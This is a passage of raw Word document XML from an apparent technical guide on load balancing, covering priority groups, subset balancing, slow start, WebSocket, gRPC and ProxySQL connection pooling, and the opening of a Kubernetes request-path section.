    <w:p w14:paraId="4E27E401" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Priority-Based Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B62D34D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951221D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Backends are organized into priority groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896972A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Priority 0: Primary pool (nearest, most capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431FDEC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Priority 1: Secondary pool (next nearest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE73482" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Priority 2: Fallback (disaster recovery region)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD616AC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Traffic goes to Priority 0 backends. Only if Priority 0's healthy capacity drops below the threshold does traffic spill to Priority 1. This prevents wasting resources on distant backends when local capacity is sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C30AE35" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Subset Load Balancing (for Cache Efficiency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22980C7C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> With hundreds of backends, consistent hashing spreads load but makes caches less effective (each backend sees a random subset of requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E23B3CF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Divide backends into subsets. Assign each client to a specific subset:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5DFF7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client is assigned to subset based on hash of client metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E09C8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client load-balances only within its assigned subset (e.g., 5 backends out of 100).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA0BA8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Those 5 backends see a concentrated set of related requests → higher cache hit rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E093E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Google's internal systems (Maglev → subset selection → backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0567DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Slow Start Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E690C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> A new backend added to the pool gets immediately hammered with traffic (especially with Least Connections — it has 0 connections, so ALL new traffic goes to it). The backend is overwhelmed before it can warm up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C0AA16" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How slow start works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3449AE5D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>New backend joins the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2EB40" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB assigns it a linearly increasing weight over a configured period (e.g., 30 seconds to ramp from 0% to 100% of normal traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7A8FA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Traffic gradually increases, giving caches time to warm, JIT to compile, connection pools to establish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A5789" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="41A49AEE">
          <v:rect id="_x0000_i2684" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CFF01" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Load Balancing Specific Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFBA35" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>15.1 WebSocket Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C74BDC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> WebSocket is a persistent, full-duplex connection. It starts as HTTP (upgrade request) then becomes a raw TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B61122" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How LBs handle it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC39DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client sends HTTP Upgrade request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F04BE6E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>L7 LB routes based on HTTP headers (can apply normal routing rules).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A786D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend accepts upgrade, responds 101 Switching Protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAA7D1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB now proxies raw TCP frames bidirectionally (no more HTTP parsing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4DBEF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Connection stays open for minutes/hours/days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423645F4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37266B39" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each WebSocket holds an LB connection indefinitely (unlike HTTP which is request-response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC2B6B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>100,000 WebSocket clients = 100,000 persistent connections through the LB (not multiplexable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A8D2D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB memory and file descriptor limits become the bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3916C101" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Connection draining takes much longer (must wait for WebSocket clients to reconnect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F70C0B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 gRPC Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895E32D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> gRPC uses HTTP/2, which multiplexes many RPC calls over a SINGLE TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293925BE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why L4 load balancing fails for gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069AF2F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>L4 LB sees one TCP connection from client to backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41726AA7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>All RPCs (hundreds of concurrent calls) flow over that one connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D725492" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>L4 routes the entire connection to one backend — no load distribution at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06233EF5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — L7 gRPC-aware load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132EF49" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB must understand HTTP/2 framing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A12726C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route individual </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> (RPCs) within the connection to different backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC8E32" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Each gRPC call gets independently load-balanced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA802C2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alternative — client-side gRPC LB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147EAA37" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>gRPC natively supports client-side load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54BC5F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client resolves the service name → gets list of backend IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB71C8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client opens connections to multiple/all backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD90DBA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>For each RPC call, client picks a backend using round-robin or pick-first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F06D04" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No server-side LB needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29930121" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Database Connection Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F1E31" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The unique challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Database connections are stateful (transactions, prepared statements, session variables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55F10C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How ProxySQL (MySQL) works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420D62DA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Application connects to ProxySQL (thinks it's connecting to MySQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16962B07" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>ProxySQL maintains a pool of connections to backend MySQL servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD5940" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>For each query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755BE73" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Parse the SQL (identify read vs. write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F77FF39" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route writes to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986DF15" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route reads to replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26291D5E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If in a transaction → pin to one backend for the transaction's duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125878D7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Between transactions, the connection is returned to the pool and can serve different app requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672093D7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection multiplexing ratio:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> 1,000 application connections might share 50 actual MySQL connections. Massive reduction in backend load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D480BC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="62D87759">
          <v:rect id="_x0000_i2685" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5BA022" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Load Balancing in Kubernetes — A Complete Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B3182" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 The Full Path of a Request in Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A473D6A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0BE8A4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Internet → Cloud LB (L4/L7) → NodePort → kube-proxy (IPVS/iptables) → Pod</w:t>
      </w:r>
    </w:p>
